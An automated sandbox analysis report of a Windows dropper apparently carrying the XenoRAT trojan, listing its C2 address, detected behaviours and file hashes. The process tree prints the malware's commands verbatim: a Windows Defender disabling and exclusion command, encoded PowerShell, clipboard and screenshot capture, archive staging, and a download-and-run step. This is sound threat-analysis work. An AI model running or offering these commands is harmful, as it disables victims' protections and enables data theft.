Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2024 02:23

General

  • Target

    363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe

  • Size

    31.0MB

  • MD5

    8f83513e7e3638b5a61c5e7f40f51c7e

  • SHA1

    e181ecf02f5575849e64f267fa733a83630191ee

  • SHA256

    363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d

  • SHA512

    c26ae71b83354a2a9fad7e5f12e6cd7de20defd455fd56cbaadc51e65a91ab506c0b98525244f6b4db25eb4586bef49f4dbb1f3e59c54312721da52c9974f091

  • SSDEEP

    786432:FjWc2f/LEmPTH4ccIAcuQ64skTX3KchPau56pIUWCkGm:xWpT9PcZ864s6HKchPipIUWC9m

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe

Extracted

Family

xenorat

C2

96.126.118.61

Mutex

lokai_je_bruh_1337

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4444

  • startup_name

    Usermode Disk Driver Host

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Xenorat family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
    "C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcgBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZwBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZgBzACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4680
    • C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe
      "C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3800
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 892
        3⤵
        • Program crash
        PID:1320
    • C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
      "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:4344
      • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\obfs.exe
        "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
        • C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe
          "C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4136
          • C:\Windows\Temp\{729E98B7-4529-4EE6-870F-5514E6C6333A}\.cr\tmpd5byfdmh.exe
            "C:\Windows\Temp\{729E98B7-4529-4EE6-870F-5514E6C6333A}\.cr\tmpd5byfdmh.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe" -burn.filehandle.attached=648 -burn.filehandle.self=688 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4396
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1800
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3136
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
            5⤵
              PID:5024
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1420
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
              5⤵
                PID:5004
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:2568
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2208
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:2856
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\ibVxS7.ps1"
              4⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:2356
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\ibVxS7.ps1
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4084
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c " powershell.exe -nop -w hidden -encodedCommand UwBFAFgAIAAkAFsARQBtAGIAZABkAF0AIAAtAFMAbwB1AHIAYwBlACAAVwBpAG4AZABvAHcAcwAuAE0AaQBzAGMAcgBvAHMAbwBmAHQALgBJAE4AVwA7ACAASQBuAHQAUwBUAFIAdQBDAFQAIABbAFMAbwBjAGsAZQB0AF0AIAAtAEUAdgBlAG4AdAAgAE4AYQBtAGUAZAAgAEUAVgBBAEsAUwBQAF8AQgB5AHAAQQBTAFMAMAA= "
              4⤵
                PID:3564
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                4⤵
                  PID:1936
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4008
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\obfs.py'"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3868
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\obfs.py'
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2960
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  4⤵
                  • Clipboard Data
                  • Suspicious use of WriteProcessMemory
                  PID:4724
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    5⤵
                    • Clipboard Data
                    PID:2600
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Drawing.Point]::Empty, [System.Drawing.Point]::Empty, $bitmap.Size);$bitmap.Save('C:\Users\Admin\AppData\Local\Temp\Rumburak\Screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);""
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1532
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Drawing.Point]::Empty, [System.Drawing.Point]::Empty, $bitmap.Size);$bitmap.Save('C:\Users\Admin\AppData\Local\Temp\Rumburak\Screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:1468
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Rumburak\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\GB_YEdi96VFf.zip' -Force""
                  4⤵
                    PID:3436
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Rumburak\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\GB_YEdi96VFf.zip' -Force"
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:4064
              • C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe
                "C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe"
                2⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2732
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks.exe" /Create /TN "Usermode Disk Driver Host" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE678.tmp" /F
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1804
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3800 -ip 3800
              1⤵
                PID:3620

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe

                Filesize

                224KB

                MD5

                5c7ff82a6ceacf1097fd5e68295936b4

                SHA1

                819def26e7c71097ab8f43db27169df23f5c610e

                SHA256

                36765099232cc72c5356b0173d7c41bd7a8153694ef6bcdf9d993c780acf6e1c

                SHA512

                4ca351d412bc0c8549412a0fe9da384f9dcceea9a794a89a9455653f0ff82b07368a133884e047e9cbbeb6a74ee800c16e53d4fbcf1dfab766b059dcb9b12767

              • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Cryptodome\Cipher\_raw_cbc.pyd

                Filesize

                12KB

                MD5

                8d17946e6b1936061203afe20cddb5b0

                SHA1

                589dac4d2864fdc0219b0de3973b2ee0023cd5ea

                SHA256

                bb9898057572f17131bb63d513c19901e29d2e29215f7a93d6d84fa537475f0b

                SHA512

                3354942781e4d36b84d83ab6959707d29f6e25d3614b15a228d63d084f6f2a280bfc9153f24ea0fef489fa7043e21eb67e4b6d3ad7d073fde37f6206462f5931

              • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

                Filesize

                122KB

                MD5

                bbd5533fc875a4a075097a7c6aba865e

                SHA1

                ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

                SHA256

                be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

                SHA512

                23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

              • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

                Filesize

                64KB

                MD5

                eedb6d834d96a3dffffb1f65b5f7e5be

                SHA1

                ed6735cfdd0d1ec21c7568a9923eb377e54b308d

                SHA256

                79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2

                SHA512

                527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

              • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

                Filesize

                284KB

                MD5

                181ac9a809b1a8f1bc39c1c5c777cf2a

                SHA1

                9341e715cea2e6207329e7034365749fca1f37dc

                SHA256

                488ba960602bf07cc63f4ef7aec108692fec41820fc3328a8e3f3de038149aee

                SHA512

                e19a92b94aedcf1282b3ef561bd471ea19ed361334092c55d72425f9183ebd1d30a619e493841b6f75c629f26f28dc682960977941b486c59475f21cf86fff85

              • C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe

                Filesize

                22.7MB

                MD5

                d2eb38546ead92ea1bbdf931b5457dc7

                SHA1

                95c9b5cca9f1e85d294a87ba46fc08536c7aac11

                SHA256

                1eb1fb740cfd035b84f71b76c4e76e805ac92bf7f7d75a80516754ead7d13779

                SHA512

                bf0364031430303977d8f8ef88c1601488bb6fc6d450602b48b6302f5bc5fa7736dee291c0be4039a144f3efca6eb5ee531d58ea85c97104afbd2bef21f4f10d

              • C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe

                Filesize

                4.6MB

                MD5

                0e40887991676af440b16986101b7c32

                SHA1

                c3b0f19d397ef2c33526d9fa9210ec2aa6ead71b

                SHA256

                047ac5b67b90cc8c180d87ca92b5e0d975abaf6ef085f8606fc176ae814fee7c

                SHA512

                fccadf83b087df14b6679d373b7de77fa30ce7f25aadb01f2d5f4365be9d459897169f06b43acd3f610009f57671b34ca2d15066b79c31985558fe4709bc59e2

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ili5qx1y.413.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\Cryptodome\Cipher\_raw_cfb.pyd

                Filesize

                12KB

                MD5

                606e85b094ae6752e1099a176aa20f09

                SHA1

                35e9355ce75b57111d3793502636d5fcd78d34a4

                SHA256

                917fa3438b61cc207d73bd72cda6c42cd08656a2187fd9ca2860c67c12677238

                SHA512

                19de7b6c567e997825f2f08773c45a3562bc3980248de31738395cafa0306707a82f912a8b9b1dba440162443e1554e87ef5586776189b763576d9a7aca9e587

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\Cryptodome\Cipher\_raw_ecb.pyd

                Filesize

                10KB

                MD5

                4db0ac98329ae64cec9c28570af52968

                SHA1

                8f7d327c1049c27b0df6bc6c2017cc302ba99a10

                SHA256

                5a43e3809403668ed6c6f17a71828eb8cd0dcb64afc09b815a4b9f05c3661714

                SHA512

                515e0b972a644620c27b3c074aee62b8ba5aa679b0e1c936f616c5537a83c7ca762b7a6c7acc3279ab235d1d344db9423cdc1abf7c72775d4bbfb2cb24cbf6b9

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\Cryptodome\Cipher\_raw_ofb.pyd

                Filesize

                11KB

                MD5

                dae7f4dd6792fb84c91bd45d44ed6c96

                SHA1

                a88eb81d4d72adc4c7f7402338f9d5760957efc3

                SHA256

                01eb2117f0223f0447cd16b5ec79baf3430871da8ef461404ba13592d2e8a89c

                SHA512

                66e98ae82073abb24e9053203f41cebb4ac30a461fe2a62baa1190970e1be7567f495914e017ec94b6b911bab721e63a7ff2d1d85e29d5824ab3d9bc9fb9fce4

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_asyncio.pyd

                Filesize

                69KB

                MD5

                28d2a0405be6de3d168f28109030130c

                SHA1

                7151eccbd204b7503f34088a279d654cfe2260c9

                SHA256

                2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d

                SHA512

                b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_bz2.pyd

                Filesize

                83KB

                MD5

                223fd6748cae86e8c2d5618085c768ac

                SHA1

                dcb589f2265728fe97156814cbe6ff3303cd05d3

                SHA256

                f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

                SHA512

                9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_cffi_backend.pyd

                Filesize

                178KB

                MD5

                0572b13646141d0b1a5718e35549577c

                SHA1

                eeb40363c1f456c1c612d3c7e4923210eae4cdf7

                SHA256

                d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

                SHA512

                67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_decimal.pyd

                Filesize

                245KB

                MD5

                3055edf761508190b576e9bf904003aa

                SHA1

                f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890

                SHA256

                e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577

                SHA512

                87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_lzma.pyd

                Filesize

                156KB

                MD5

                05e8b2c429aff98b3ae6adc842fb56a3

                SHA1

                834ddbced68db4fe17c283ab63b2faa2e4163824

                SHA256

                a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c

                SHA512

                badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_overlapped.pyd

                Filesize

                54KB

                MD5

                ba368245d104b1e016d45e96a54dd9ce

                SHA1

                b79ef0eb9557a0c7fa78b11997de0bb057ab0c52

                SHA256

                67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615

                SHA512

                429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_queue.pyd

                Filesize

                31KB

                MD5

                6e0cb85dc94e351474d7625f63e49b22

                SHA1

                66737402f76862eb2278e822b94e0d12dcb063c5

                SHA256

                3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b

                SHA512

                1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_socket.pyd

                Filesize

                81KB

                MD5

                dc06f8d5508be059eae9e29d5ba7e9ec

                SHA1

                d666c88979075d3b0c6fd3be7c595e83e0cb4e82

                SHA256

                7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

                SHA512

                57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_ssl.pyd

                Filesize

                174KB

                MD5

                5b9b3f978d07e5a9d701f832463fc29d

                SHA1

                0fcd7342772ad0797c9cb891bf17e6a10c2b155b

                SHA256

                d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa

                SHA512

                e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_uuid.pyd

                Filesize

                24KB

                MD5

                353e11301ea38261e6b1cb261a81e0fe

                SHA1

                607c5ebe67e29eabc61978fb52e4ec23b9a3348e

                SHA256

                d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899

                SHA512

                fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\_wmi.pyd

                Filesize

                35KB

                MD5

                7ec3fc12c75268972078b1c50c133e9b

                SHA1

                73f9cf237fe773178a997ad8ec6cd3ac0757c71e

                SHA256

                1a105311a5ed88a31472b141b4b6daa388a1cd359fe705d9a7a4aba793c5749f

                SHA512

                441f18e8ce07498bc65575e1ae86c1636e1ceb126af937e2547710131376be7b4cb0792403409a81b5c6d897b239f26ec9f36388069e324249778a052746795e

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\charset_normalizer\md.pyd

                Filesize

                10KB

                MD5

                d9e0217a89d9b9d1d778f7e197e0c191

                SHA1

                ec692661fcc0b89e0c3bde1773a6168d285b4f0d

                SHA256

                ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0

                SHA512

                3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\charset_normalizer\md__mypyc.pyd

                Filesize

                120KB

                MD5

                bf9a9da1cf3c98346002648c3eae6dcf

                SHA1

                db16c09fdc1722631a7a9c465bfe173d94eb5d8b

                SHA256

                4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637

                SHA512

                7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\libcrypto-3.dll

                Filesize

                5.0MB

                MD5

                e547cf6d296a88f5b1c352c116df7c0c

                SHA1

                cafa14e0367f7c13ad140fd556f10f320a039783

                SHA256

                05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

                SHA512

                9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\libffi-8.dll

                Filesize

                38KB

                MD5

                0f8e4992ca92baaf54cc0b43aaccce21

                SHA1

                c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                SHA256

                eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                SHA512

                6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

